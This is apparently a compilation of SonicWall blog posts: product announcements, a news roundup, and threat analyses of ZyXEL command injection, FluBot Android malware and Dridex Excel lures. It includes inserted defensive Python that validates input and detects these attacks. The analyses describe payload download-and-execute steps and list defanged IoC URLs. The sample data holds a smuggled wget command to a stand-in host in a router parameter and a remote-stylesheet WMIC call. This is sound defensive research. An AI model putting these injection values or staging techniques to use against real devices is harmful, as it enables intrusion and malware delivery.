Announcing Wireless Network Manager for Unified Wired and Wireless Management

Wireless devices are driving digital transformation to the cloud. Today 94% of enterprises use the cloud, and 94% of SMBs report security benefits after moving to the cloud. And this year, worldwide wireless device adoption has exploded to 22 billion. As a result, securing and managing wireless networks has become more challenging.

SonicWall Wireless Network Manager provides integrated management of SonicWave Access Points and SonicWall Switches for unified visibility and control of wired and wireless networks. This cloud-based management solution is designed to be user-friendly while simplifying access, control and troubleshooting capabilities.

Single-Pane-of-Glass Management

Global networks can be managed easily from a single pane of glass with Wireless Network Manager — which is a part of the SonicWall Capture Security Center ecosystem. Being highly scalable, it is suitable for organizations of any size. Everything from single-site wireless deployments to vast enterprise networks can be easily overseen with the Wireless Network Manager.

Scalability and Unified Policy

This dashboard unifies multiple tenants, locations and zones while simultaneously supporting tens of thousands of SonicWave access points and SonicWall Switches. Create a unified wired and wireless policy at the tenant level and push that down to various locations and zones. Drill down on managed devices for more granular data. Receive firmware and security updates from the cloud automatically so that your devices are always up to date.

Reliable Operation

Since the Wireless Network Manager controls only the management plane functions of the access points and switches, internet outages do not impact their performance. Although there is a temporary loss in management capability, access points and switches continue to work seamlessly, ensuring business continuity.

Zero-Touch Deployment

The Zero-Touch Deployment (ZTD) feature of SonicWave access points and SonicWall Switches ensures that onboarding is automated and the network is up in minutes. Provisioning these devices is simple and can be done remotely, saving both time and money. Just register and onboard the devices from anywhere with the SonicExpress app — once the devices are connected and turned on, ZTD authenticates, associates and configures them automatically.

Advanced Analysis Tools

Once the access points are registered and onboarded, and before they are physically deployed, performing a wireless site survey helps ensure increased workforce productivity. The SonicWall WiFi Planner tool, available within Wireless Network Manager, is the ideal enablement tool to plan smarter and eliminate costly installation mistakes. It enables administrators to optimally plan and deploy a wireless network for an enhanced WiFi user experience. Additionally, WNM’s Topology tool provides network topology maps and managed-device statistics.

Lower TCO

Cloud-based WNM drives down total cost of ownership by shifting capital expenditures (CAPEX) to operating expense (OPEX). WNM cuts out the cost and maintenance of redundant hardware-based controllers and optimizes data center rack space, and its intuitive interface reduces training and administrative overhead costs.

Regardless of the size of your organization, SonicWall Wireless Network Manager offers unified visibility and control in a secure, Wi-Fi cloud-managed solution. To learn more, visit sonicwall.com/wnm

NSM On-Prem vs. NSM SaaS: Which Is Best for You?

SonicWall’s Network Security Manager (NSM) provides centralized management, 360-degree control and unparalleled visibility into network security infrastructures utilizing SonicWall Next-Generation Firewalls (NGFW).

NSM offers two deployment options: on cloud and on-prem. If you’re wondering which is the best fit for your environment, here are some factors to consider:

  • Understanding Your Business Needs: The emergence of cloud computing has allowed companies to shift the management and maintenance of their IT infrastructure to their cloud provider, thereby reducing their operational costs. SonicWall reduces your operational overhead in much the same way by hosting and maintaining the web-based NSM SaaS application in the cloud. NSM SaaS is a scalable, cloud-native offering that’s easy to deploy. It is ideal for the security needs of any business, particularly a small or medium-sized business, that wants to minimize its day-to-day IT costs and offload its operational and deployment challenges to SonicWall. But say you have a well-established IT infrastructure of your own and customization is key for you — for example, a managed security service provider (MSSP) with a dedicated IT team to deploy, constantly monitor and maintain on-prem systems for clients. In that case, NSM on-prem would be the better choice. This option also offers full control over the scaling of your on-prem system to quickly facilitate on-demand growth.
  • Feature Parity: NSM SaaS and NSM on-prem use a unified code base — meaning you’ll get the same management capabilities on both. In other words, features like device groups, tenant management, user management, templates, commit and auditing workflow, etc., will be the same. But the NSM 2.2 release brings along a few more NSM on-prem-specific security and deployment features:
    • Closed Network Support: A closed network is a private network that is completely shut off from the outside environment and has no internet connectivity. NSM 2.2 helps preserve the privacy and security of closed networks by offering an air-gap method for onboarding and licensing SonicWall firewall devices managed by NSM — meaning you won’t have to contact License Manager (LM) or MySonicWall.com (MSW).
    • User Access Controls: You can prevent unauthorized individuals from gaining access to your on-prem environment through enhanced security features. These include account lockout after a number of unsuccessful login attempts, two-factor authentication through the Microsoft or Google authenticator apps, IP address whitelisting, and so on.
    • High Availability Support: To ensure there is no single point of failure and to provide uninterrupted access to NSM, the NSM 2.2 release lets users associate a secondary node to their primary node with similar settings.
    • Deployment Flexibility: NSM on-prem can now be deployed on Azure, KVM, ESXi and Hyper-V platforms. The minimum system requirements are 16 GB of RAM and a 4-core CPU.
  • Licensing: Both NSM SaaS and NSM on-prem are based on subscription licensing models. NSM SaaS licensing depends on firewall type and has two available options, NSM Essentials and NSM Advanced. NSM Essentials offers full management capability with seven days of reporting, whereas NSM Advanced contains full management capability with 365 days of reporting and 30 days of Analytics. NSM on-prem licensing is node-based, with a base license of five nodes and add-on licenses. Currently, NSM on-prem has full management capabilities only. On-prem Analytics can be used as an add-on license for data reporting and analytics.

In summary, NSM on-prem is ideal for deployments requiring tighter system and data security controls, such as a closed network environment. But if you’re looking for on-demand scaling and a modern, cloud-native architecture, NSM SaaS is the best fit for you. Either way, you’ll get everything you need for comprehensive firewall management. And whatever you choose, you can rest assured that SonicWall is committed to providing you with impeccable support and a comprehensive feature set.

CSa 1.2: Advanced, Closed-Network Threat Protection

With the introduction of SonicWall CSa 1000, we brought the threat prevention capabilities of Capture ATP and our patented Real-Time Deep Memory Inspection™ (RTDMI) on prem — allowing government, healthcare and other organizations subject to compliance or data residency restrictions to utilize similar protection formerly offered only in the cloud.

But at the time, using these appliances still required admins to connect to the cloud to check for previously registered verdicts for files.

With the introduction of Capture Security appliance 1.2 (CSa 1.2), however, we have eliminated this requirement, further strengthening our commitment to preserving the privacy and security of closed networks for our most compliance- and security-sensitive customers.

CSa can now be deployed in closed, air-gapped networks, behind other vendor firewalls and/or proxies. To further support these types of networks, we are preparing the FIPS 140-2 certification for the CSa.

CSa is designed as an on-premises malware detection appliance, giving IT administrators the power of RTDMI when analyzing suspicious files. It analyzes a broad range of file types, detecting and blocking zero-day exploits, suspicious files and even side-channel attacks such as Meltdown, Spectre, Foreshadow, PortSmash, Spoiler, MDS and TPM-Fail.

This update also includes improvements to automation and usability. We are expanding the API’s ability from just the submission of files to also include the management of users and devices, and the ability to add or remove users and devices from the “allow” list within CSa.

Furthermore, to limit the potential for one or more of your sources to overuse the CSa, we added rate limiting by source. With this feature you can now select how many files per hour or per day a particular device can submit to the CSa.
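As an added illustration of what a per-source submission quota looks like in code, here is a small sliding-window limiter with an hourly and a daily ceiling per source. It is example code written for this page, not the appliance's own implementation; the quota values, source identifiers and timestamps used below are constructed.

```python
from collections import defaultdict, deque

HOUR = 3600
DAY = 86400


class SourceRateLimiter:
    """Per-source submission quota enforced over two sliding windows (the last
    hour and the last day). Added example; not the appliance's own code."""

    def __init__(self, default_per_hour, default_per_day, overrides=None):
        # overrides: {source_id: (per_hour, per_day)} for devices that need a
        # quota different from the default
        self.default = (default_per_hour, default_per_day)
        self.overrides = dict(overrides or {})
        self.history = defaultdict(deque)  # source_id -> accepted timestamps

    def quota(self, source_id):
        return self.overrides.get(source_id, self.default)

    def usage(self, source_id, now):
        """Return (submissions in the last hour, submissions in the last day)."""
        q = self.history[source_id]
        # Drop timestamps older than the longest window so the deque stays small.
        while q and now - q[0] >= DAY:
            q.popleft()
        last_hour = sum(1 for t in q if now - t < HOUR)
        return last_hour, len(q)

    def allow(self, source_id, now):
        """Decide whether a submission from source_id at time `now` (seconds)
        fits within both quotas. Accepted submissions are recorded; rejected
        ones are not, so a flood of rejected attempts does not extend the ban."""
        per_hour, per_day = self.quota(source_id)
        last_hour, last_day = self.usage(source_id, now)
        if last_hour >= per_hour or last_day >= per_day:
            return False
        self.history[source_id].append(now)
        return True


def simulate(limiter, source_id, times):
    """Run a sequence of submission attempts and return the verdicts."""
    return [limiter.allow(source_id, t) for t in times]


if __name__ == "__main__":
    # Constructed scenario: 3 files per hour, 5 per day for a branch firewall.
    lim = SourceRateLimiter(default_per_hour=3, default_per_day=5)
    print(simulate(lim, "fw-branch-1", [0, 1, 2, 3]))          # 4th in the hour rejected
    print(simulate(lim, "fw-branch-1", [3601, 3602, 3603]))    # daily ceiling hit on the last
```

The hourly check and the daily check are evaluated independently, so a device that is quiet for an hour regains its hourly allowance but still cannot exceed its daily total.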

For more information about CSa, please visit our website or contact your sales representative for a list of other usability enhancements.

Cybersecurity News & Trends

This week, SonicWall released its biggest trove of threat intelligence yet: The 2021 SonicWall Cyber Threat Report.


SonicWall in the News

Microsoft Office Files Now Used By Hackers to Spread Malware: IoT Under Attack — Tech Times

  • Tech Times covered SonicWall’s 2021 Cyber Threat Report, highlighting the surge in malicious Office file attacks.

Election security report calls out Russian, Iranian influence ops. Remediation progress. Ukraine finds Russian cyberespionage — CyberWire

  • SonicWall’s 2021 Cyber Threat Report was included under the “Cyber Trends” section of the newsletter.

Threat Actors Thriving on the Fear and Uncertainty of Remote Workforces — Help Net Security

  • Help Net Security shared an article on SonicWall’s 2021 Threat Report, highlighting that cyber criminals preyed on the new remote work reality.

Ransomware Up 62 Percent Since 2019 — BetaNews

  • BetaNews shared an article on SonicWall’s 2021 Threat Report, highlighting the growth in ransomware.

New SonicWall 2020 Research Shows Cyber Arms Race At Tipping Point — CRN

  • This article features the findings from SonicWall’s 2021 Cyber Threat Report.

SonicWall: Pandemic exposes record-breaking cyber attacks — Mobile News

  • This article features the findings from SonicWall’s 2021 Cyber Threat Report.

Ransomware and IoT Malware Detections Surge By Over 60% — InfoSecurity Magazine

  • InfoSecurity Magazine covered SonicWall’s 2021 Cyber Threat Report, highlighting the double-digit surge in ransomware and IoT malware.

Cybercrime Saw an ‘Explosion’ in 2020 — ITProPortal

  • ITProPortal covered SonicWall’s 2021 Cyber Threat Report, highlighting that ransomware, cryptojacking and malicious Office files were the most popular vectors for cybercrime in 2020.

ChannelPro Weekly Podcast: Episode #178 — ChannelPro Weekly Podcast

  • This podcast features an interview with Dmitriy discussing the impact the pandemic had on cybersecurity and the cybersecurity trends of 2021.

Industry News

More than $4 billion in cybercrime losses reported to FBI in 2020 — FBI Internet Crime Report 2021

  • American victims reported $4.2 billion in losses as a result of cybercrime and internet fraud to the FBI in 2020, a roughly 20% uptick from 2019.

Attackers are trying awfully hard to backdoor iOS developers’ Macs — Ars Technica

  • Researchers said they’ve found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.

Ransom Payments Have Nearly Tripled — Dark Reading

  • In 2020, ransomware targeted the manufacturing sector, healthcare organizations and construction companies, with the average ransom reaching $312,000, a report finds.

U.S. taxpayers targeted with RAT malware in ongoing phishing attacks — Bleeping Computer

  • U.S. taxpayers are being targeted by phishing attacks attempting to take over their computers using malware and steal sensitive personal and financial information.

$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware — Threat Post

  • The American Rescue Act is the latest zeitgeisty lure being circulated in an email campaign.

Mimecast Says SolarWinds Hackers Stole Source Code — SecurityWeek

  • Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack and revealed that the threat actor managed to steal some source code.

Buffalo Public Schools cancels classes after cyberattack — Cyberscoop

  • Ransomware attackers appear to have taken a swipe at Buffalo Public Schools in recent days, screeching the school system’s plans for remote classes and in-person learning to a halt on Friday.

FBI warns of escalating Pysa ransomware attacks on education orgs — Bleeping Computer

  • The Federal Bureau of Investigation (FBI) Cyber Division has warned system administrators and cybersecurity professionals of increased Pysa ransomware activity targeting educational institutions.

Bitcoin surges past $60,000 for first time — BBC

  • Bitcoin, which has more than tripled in value since the end of last year, has been powered on by well-known companies adopting it as a method of payment.

Exclusive: Microsoft could reap more than $150 million in new U.S. cyber spending, upsetting some lawmakers — Reuters

  • Microsoft stands to receive nearly a quarter of COVID-19 relief funds destined for U.S. cybersecurity defenders, angering some lawmakers who don’t want to increase funding for a company whose software was recently at the heart of two big hacks.

Molson Coors says cyberattack disrupted beer brewing — Cyberscoop

  • Molson Coors, one of the biggest beer companies in the U.S., didn’t provide many specifics about the cyberattack.

With Spectre Still Lurking, Google Looks to Protect the Web — Wired

  • Researchers from Google have developed a proof-of-concept that reveals the hazard Spectre assaults pose to the browser.

Ransomware now attacks Microsoft Exchange servers with ProxyLogon exploits — Bleeping Computer

  • A new ransomware called ‘DEARCRY’ is targeting Microsoft Exchange servers, with one victim stating they were infected via the ProxyLogon vulnerabilities.

In Case You Missed It

Attackers actively targeting vulnerable ZyXEL routers

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in ZyXEL products. TrueOnline is a major internet service provider in Thailand which distributes various rebranded ZyXEL routers to its customers.

Command Injection Vulnerability CVE-2017-18368

The ZyXEL P660HN-T router distributed by TrueOnline is prone to a command injection vulnerability in the Remote System Log forwarding function. This function is accessible to an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.

The following exploit was spotted in the wild:

This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function. The vulnerability is in the ViewLog.asp page, which is accessible without authentication. The attacker takes advantage of the vulnerability, bypassing authentication, by appending commands to the remote_host parameter in a POST request.

The attacker downloads a malicious executable by injecting a wget command and saves it in the tmp directory. They then set the permissions of the malicious file to 777, meaning the file is readable, writable and executable by all users. The attacker then executes the malicious file and deletes it to leave no trace.
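The defensive lesson of this bug is an allowlist on the value (an IP address or a hostname, nothing else) instead of a blocklist of shell characters, and the same check doubles as a detection rule over captured requests. The following Python is an added example written for this page; it is neither ZyXEL's firmware code nor a SonicWall signature. The /cgi-bin/ path prefix, the placeholder command name syslog-forward and the sample request bodies are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 253 characters in total.
_HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def is_valid_remote_host(value):
    """Allowlist check for a remote syslog target: a literal IP address or a
    syntactically valid hostname, nothing else. Shell metacharacters,
    whitespace and URLs all fail, so nothing reaches a shell downstream."""
    if not value:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def build_forward_command(remote_host):
    """Hardened form of the forwarding call: validate first, then build an
    argv list so no shell ever parses the value. 'syslog-forward' is a
    placeholder name standing in for the firmware's own syslog client."""
    if not is_valid_remote_host(remote_host):
        raise ValueError("remote_host rejected: %r" % remote_host)
    return ["syslog-forward", "--host", remote_host]


def flag_viewlog_request(path, body):
    """Detection rule for captured HTTP POSTs: a request to ViewLog.asp whose
    remote_host value is not a plain IP address or hostname is suspicious."""
    verdict = {"suspicious": False, "value": None}
    if not path.lower().endswith("/viewlog.asp"):
        return verdict
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes values
    for value in params.get("remote_host", []):
        if not is_valid_remote_host(value):
            verdict["suspicious"] = True
            verdict["value"] = value
            break
    return verdict


# Constructed sample requests (path, form body). The /cgi-bin/ prefix and the
# addresses are made up; the third body carries a chained command after the
# address, the shape described above.
SAMPLE_REQUESTS = [
    ("/cgi-bin/ViewLog.asp", "remote_host=192.0.2.10"),
    ("/cgi-bin/ViewLog.asp", "remote_host=syslog.example.net"),
    ("/cgi-bin/ViewLog.asp",
     "remote_host=192.0.2.10%3Bwget+http%3A%2F%2Fexample.invalid%2Fx"),
    ("/cgi-bin/index.asp", "user=admin"),
]


def scan(requests):
    """Return the indexes of the suspicious requests."""
    return [i for i, (path, body) in enumerate(requests)
            if flag_viewlog_request(path, body)["suspicious"]]


if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        print("suspicious request", i, flag_viewlog_request(*SAMPLE_REQUESTS[i]))
```

The validator is deliberately strict: a value that is not an address or a hostname has no legitimate use as a syslog target, so rejecting it loses nothing and removes the whole class of injected payloads rather than a list of known bad characters.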

SonicWall Capture Labs provides protection against this threat via the following signatures:

    • IPS 15168: ZyXEL Products Command Execution (CVE-2017-18368)
    • GAV: Tsunami.DN

This vulnerability is patched.

Threat Graph

IoCs:

107.174.133.119

b28a3fbf79afdbf3965b6890cb2a1a7c5a0bdb59e50e98f1e20389894c8d928b

Android FluBot infections continue but with a dip in numbers

Four suspects were arrested in March 2021 in Barcelona in connection with the Android banker FluBot. The majority of the malware’s victims are located in Spain. However, even after the arrests, FluBot continues to spread, albeit in lower numbers.

The chart below shows a dip in FluBot samples in March compared to the previous two months.

Common application names used by this campaign that we identified are:

  • FedEx
  • DHL

Common package names used by this campaign that we identified are:

  • com.tencent.mm
  • com.tencent.mobileqq

Below is an analysis of a specific sample belonging to this campaign:

  • MD5: 1a2a4044cf18eed59e66c413db766145
  • Package Name: com.tencent.mm
  • Application Name: Fed Ex

The malware requests the following permissions:

  • android.permission.CALL_PHONE
  • android.permission.FOREGROUND_SERVICE
  • android.permission.INTERNET
  • android.permission.NFC
  • android.permission.QUERY_ALL_PACKAGES
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_SMS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.REQUEST_DELETE_PACKAGES
  • android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
  • android.permission.SEND_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_SMS

A few of the sensitive actions that can be performed using these permissions:

  • Access contacts
  • Place phone calls
  • Access SMS
  • Send SMS
  • Ignore battery optimizations, preventing the application from hibernating
  • Auto start the malware after device reboot
  • Access Internet

Upon installation, the malware requests access to Accessibility services.

In Android, the first screen that appears to the user is referred to as the Main Activity. This activity can be identified as the one whose intent filter has the action MAIN and the category LAUNCHER. For the FluBot sample in question, the activity identified as the main activity cannot be located among the classes within the code tree.

This indicates that the real code containing the main activity is likely in a different file that is decrypted and dropped locally when the malware executes.
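To turn the permission review and the main-activity check above into a repeatable triage step, here is an added Python example written for this page (it is not SonicWall's tooling). It parses a constructed AndroidManifest.xml that carries the permissions listed above, flags sensitive permission combinations and an accessibility-service declaration, locates the MAIN/LAUNCHER activity, and reports when that class is absent from the set of classes recovered from the code tree, which is the signal that the real code is dropped at runtime. The activity and service class names and the code-tree class set are made up for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android(attr):
    """Qualified attribute name for android:<attr> as ElementTree sees it."""
    return "{%s}%s" % (ANDROID_NS, attr)


# Constructed manifest: the permissions are the ones listed above, the package
# name matches the analysed sample, and the class names are made up.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.tencent.mm">
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.NFC"/>
  <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <application android:label="Fed Ex">
    <activity android:name="com.tencent.mm.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name="com.tencent.mm.AccService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
  </application>
</manifest>
"""

# Constructed: class names an analyst recovered from the visible code tree.
CODE_TREE_CLASSES = {"com.tencent.mm.App", "com.tencent.mm.Loader",
                     "com.tencent.mm.AccService"}

# Permission sets that together enable the sensitive actions listed above.
RISK_RULES = [
    ("sms-interception", {"android.permission.READ_SMS",
                          "android.permission.RECEIVE_SMS"}),
    ("sms-sending", {"android.permission.SEND_SMS"}),
    ("contact-harvesting", {"android.permission.READ_CONTACTS",
                            "android.permission.INTERNET"}),
    ("persistence", {"android.permission.RECEIVE_BOOT_COMPLETED",
                     "android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"}),
    ("phone-calls", {"android.permission.CALL_PHONE"}),
]


def declared_permissions(root):
    return sorted(e.get(android("name")) for e in root.iter("uses-permission"))


def launcher_activities(root):
    """Activities whose intent filter carries action MAIN and category LAUNCHER."""
    found = []
    for act in root.iter("activity"):
        for flt in act.findall("intent-filter"):
            actions = {a.get(android("name")) for a in flt.findall("action")}
            cats = {c.get(android("name")) for c in flt.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in cats):
                found.append(act.get(android("name")))
    return found


def declares_accessibility_service(root):
    return any(s.get(android("permission")) ==
               "android.permission.BIND_ACCESSIBILITY_SERVICE"
               for s in root.iter("service"))


def triage(manifest_xml, code_tree_classes):
    root = ET.fromstring(manifest_xml)
    perms = declared_permissions(root)
    findings = [name for name, needed in RISK_RULES if needed <= set(perms)]
    if declares_accessibility_service(root):
        findings.append("accessibility-service")
    launchers = launcher_activities(root)
    missing = [c for c in launchers if c not in code_tree_classes]
    if missing:
        # Launcher class absent from the code tree: expect a packed/dropped dex.
        findings.append("launcher-class-missing")
    app = root.find("application")
    return {"package": root.get("package"),
            "label": app.get(android("label")) if app is not None else None,
            "permissions": perms, "launchers": launchers,
            "missing_launcher_classes": missing, "findings": findings}


if __name__ == "__main__":
    print(triage(SAMPLE_MANIFEST, CODE_TREE_CLASSES))
```

The rules are combinations rather than single permissions because, for instance, READ_CONTACTS alone is common in legitimate apps, while READ_CONTACTS together with INTERNET in an app labelled as a courier is what makes the contact-harvesting finding worth an analyst's time.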

As expected, a dex file is dropped during execution into the local app_apkprotector_dex folder as classes-v1.dex and classes-v1.bin.

The classes-v1.bin file is actually a .dex file, and it contains the malicious code that is executed at runtime. The main activity class that could not be located earlier can be seen in this file.

FluBot contains capabilities to receive the following commands and execute associated actions:

  • BLOCK
  • SOCKS
  • UPLOAD_SMS
  • OPEN_URL
  • NOTIF_INT_TOGGLE
  • RUN_USSD
  • DISABLE_PLAY_PROTECT
  • RELOAD_INJECTS
  • SEND_SMS
  • GET_CONTACTS
  • RETRY_INJECT
  • UNINSTALL_APP
  • CARD_BLOCK
  • SMS_INT_TOGGLE

The command AMI_DEF_SMS_APP requests that the user set the FluBot app as the default SMS application on the device.

The command CARD_BLOCK shows the user a fake card-details activity, which is used to steal credit card information.

FluBot is difficult to remove from the device because it has access to accessibility services. If a victim tries the regular way of removing it via Settings > Apps > Fed Ex (or whatever name the FluBot sample uses), the malware force-closes the Settings app and displays the message “You can not perform this action on a service system”.

FluBot contains a Domain Generation Algorithm (DGA), which it uses to communicate with its C&C servers. As shown below, a single APK contacts a number of different URLs.

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • AndroidOS.FluBot.CL (Trojan)

Indicators of Compromise (IOCs):

  • 1a2a4044cf18eed59e66c413db766145
  • 74f88d5480aefe165721c36100dcf89a
  • 3759f4ae5378372d34be6022c31c306c

Fake SpaceX Starbase Invite Excel document found distributing Dridex

The SonicWall Capture Labs Threat Research Team has observed a fake SpaceX Starbase invite being circulated over email with a malicious Excel document as an attachment. On opening the attachment, it executes VBA macro code to infect the system with Dridex malware.

Infection Cycle

Upon opening the attachment, the user is shown instructions to enable content, as shown below:


Fig-1: Excel File

The malicious Excel file has an obfuscated macro and a Workbook_Open method, which gets executed upon opening the document. The VBA macro drops an XSL file to %appdata%\<random>.xsl. The dropped XSL file is then executed by passing it as an argument to WMIC (the Windows Management Instrumentation Command-line utility).


Fig-2: VBA Macro creating XSL file

XSL file

XSL files are style sheets for processing data in XML files, and they also support script embedding and execution. This old technique is catalogued as MITRE ATT&CK ID T1220.

The XSL file contains JScript code to download and execute the payload. The payload takes “validateLog” as an argument, as shown below:


Fig-3: Contents of XSL file
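Because the chain above ends with WMIC loading a stylesheet from a user-writable location, the process-creation event is the most reliable place to catch it. The following Python is an added example written for this page, not Capture ATP's detection logic. It applies the T1220 heuristic to Sysmon-style process-creation events: wmic.exe started with a /format: argument that points outside the built-in stylesheet set, weighted higher when the parent process is an Office application. The events, user name and file names are constructed.

```python
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# wmic's built-in stylesheets are referenced by bare names (list, csv, ...)
# and resolve under %SystemRoot%\System32\wbem\. Anything with a path
# separator or a URL scheme is an external stylesheet.
FORMAT_RE = re.compile(r'/format\s*:\s*"?([^\s"]+)', re.IGNORECASE)


def basename(win_path):
    """Last path component of a Windows path, lower-cased."""
    return win_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def format_target(command_line):
    """The value passed to /format:, or None when the switch is absent."""
    m = FORMAT_RE.search(command_line)
    return m.group(1) if m else None


def is_external_stylesheet(target):
    t = target.lower()
    if "://" in t:
        return True
    if "\\" in t or "/" in t:
        return "\\system32\\wbem\\" not in t
    return False  # bare name such as 'list' or 'csv'


def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    if basename(event["image"]) != "wmic.exe":
        return None
    target = format_target(event["command_line"])
    office_parent = basename(event["parent_image"]) in OFFICE_APPS
    external = target is not None and is_external_stylesheet(target)
    if external and office_parent:
        return "high"
    if external or office_parent:
        return "medium"
    return None


def scan(events):
    """(index, severity) for every event that trips the rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


# Constructed Sysmon-style process-creation events.
SAMPLE_EVENTS = [
    # Office parent plus a stylesheet under the user's roaming profile
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic os get /format:"C:\Users\alice\AppData\Roaming\k3s9f.xsl"'},
    # routine administrative use of a built-in format
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic os get /format:list"},
    # remote stylesheet, no Office parent
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic process list /format:"https://example.invalid/t.xsl"'},
    # Office spawning a print helper: not wmic, so ignored
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe"},
]


if __name__ == "__main__":
    for index, severity in scan(SAMPLE_EVENTS):
        print(severity, SAMPLE_EVENTS[index]["command_line"])
```

Keying on the parent process as well as the argument keeps the built-in formats quiet for administrators while still surfacing the Office-to-WMIC pattern even when the attacker renames the dropped stylesheet.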

 

SonicWall Capture ATP protects against this threat as shown below:


Fig-4: Capture ATP report

 

Indicators of Compromise

SHA256 of malicious excel files:

  • 21bf810cf015e8ffec9b844632a94274d9d387ad528e7d75adf116acea5a4d4b
  • 2355f05bca712ce31b1fef911395862eb34e73db7a3ca0a6bee2664024e47518
  • 376dad0f953db87ebfa71edb5173d4d8226c242d257a40cc9359f4d53b850aff
  • 466e4c5fe6b3c05ff34e487a0ba0910c1dc53b1c41ef1c27a779379bd2c9534d
  • 4d8ae33f7f5e41d9b3c3109daf043f5a803c639a68a697838bdcd17135c03730
  • 55a258190c8461b2aec9e698edb85297f2c850de44e6659529b00a0af7c98fe6
  • a5bc04a9b80ebb1b62367b8fec7463da3b0d096bc99c798f7ecf1f048580729c
  • af686418e437e9dca34e08381e3dc8e5f3aa06a458e610d9095ce2eb0a00ebc4
  • c83e3d04d0807dbb1144f776ab144e9b85c94b0c0e8ca05f78664e6e46f621cd
  • ee3755902532f4636d3a8a86de2f9bc13ae235a9220f97a8862d82bc52599066

Network Connections:

  • https://new[.]bombill[.]com/B2B/js/public_html/new[.]bombill[.]com/kML98YVm1[.]php
  • https://mishpachton[.]club/wp-content/uploads/2020/01/sULnmh1mel6Ha[.]php
  • https://hotelmarissa[.]ro/hms/highslide/graphics/outlines/aKBRsNGhkJnFy[.]php
  • https://lekkievents[.]com/RcjJztqmB3CJ[.]php
  • https://slasinfo[.]com/wp-content/plugins/better-wp-security/core/Z3w9lRfmiUeqn[.]php
  • https://turktech[.]co[.]uk/wp-content/uploads/2020/01/XBKtCe6h[.]php
  • https://marcosindiagroup[.]com/wp-content/uploads/elementor/css/Y1KA13a0oHq0vv[.]php
  • https://drakarys[.]rs/img/icons/tabs/xTPpiyC3[.]php
  • https://jettyplus[.]com/wp-includes/sodium_compat/namespaced/Core/n95mTqnEYm2lEqF[.]php
  • https://desertkingresort[.]com/wp-includes/js/mediaelement/renderers/Qh3RRz2g[.]php
  • https://elivebox[.]net/school/bower_components/chosen/docsupport/7Il9rC5wQ[.]php
  • https://eletronicaeduardo[.]com[.]br/www3/sistema/application/config/ANBPUKvb49gQn[.]php
  • https://mail[.]beetleorchid[.]in//i07uqfyKKQ3jUN8[.]php
  • https://nationalngofederation[.]com/wp-includes/SimplePie/Decode/HTML/CQiRG6YtYGt[.]php
  • https://leer-afrikaans[.]co[.]za/5TdZj0lfsvo[.]php
  • https://mail[.]account[.]inventorybiz[.]com//X70ySsjm2[.]php
  • https://elkytoursandtravel[.]com/wp-includes/SimplePie/Decode/HTML/i06d5d4XcypWc[.]php
  • https://drlamyas[.]net/wp-content/plugins/LayerSlider/classes/gt45kDacR6[.]php
  • https://one2onematch[.]net/back_up/under/fonts/Montserrat/kDCn9x8aeY8jz[.]php
  • https://centrodetraduccionespuce[.]com/intranet_old/css/vendor/square/risWzMrGzRtO4bS[.]php
